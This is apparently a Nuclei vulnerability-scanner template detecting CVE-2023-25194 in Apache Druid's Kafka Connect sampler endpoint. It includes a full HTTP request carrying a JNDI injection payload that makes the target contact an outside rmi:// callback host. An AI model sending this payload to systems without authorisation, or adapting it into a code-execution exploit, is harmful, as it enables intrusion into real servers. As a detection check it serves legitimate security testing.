Apache Druid Kafka Connect - Remote Code Execution

id: CVE-2023-25194

info:
  name: Apache Druid Kafka Connect - Remote Code Execution
  author: j4vaovo
  severity: high
  description: |
    The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25194
    - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce
    - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html
    - https://kafka.apache.org/cve-list
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-25194
    cwe-id: CWE-502
    epss-score: 0.89626
    epss-percentile: 0.98692
    cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: kafka_connect
    shodan-query: html:"Apache Druid"
  tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast

http:
  - raw:
      - |
        POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "type":"kafka",
            "spec":{
                "type":"kafka",
                "ioConfig":{
                    "type":"kafka",
                    "consumerProperties":{
                        "bootstrap.servers":"127.0.0.1:6666",
                        "sasl.mechanism":"SCRAM-SHA-256",
                        "security.protocol":"SASL_SSL",
                        "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
                    },
                    "topic":"test",
                    "useEarliestOffset":true,
                    "inputFormat":{
                        "type":"regex",
                        "pattern":"([\\s\\S]*)",
                        "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                        "columns":[
                            "raw"
                        ]
                    }
                },
                "dataSchema":{
                    "dataSource":"sample",
                    "timestampSpec":{
                        "column":"!!!_no_such_column_!!!",
                        "missingValue":"1970-01-01T00:00:00Z"
                    },
                    "dimensionsSpec":{

                    },
                    "granularitySpec":{
                        "rollup":false
                    }
                },
                "tuningConfig":{
                    "type":"kafka"
                }
            },
            "samplerConfig":{
                "numRows":500,
                "timeoutMs":15000
            }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'RecordSupplier'

      - type: status
        status:
          - 400
# digest: 4a0a00473045022100f788a795856513e1cd0015cba30415da3dd2e1a04d54f3ce0b6fb0f6f63e6ec9022005b2370ad3db8893c2793d0916510d1ddd938746e3cb8ef40eec403e4e3218d5:922c64590222798bb761d5b6d8e72950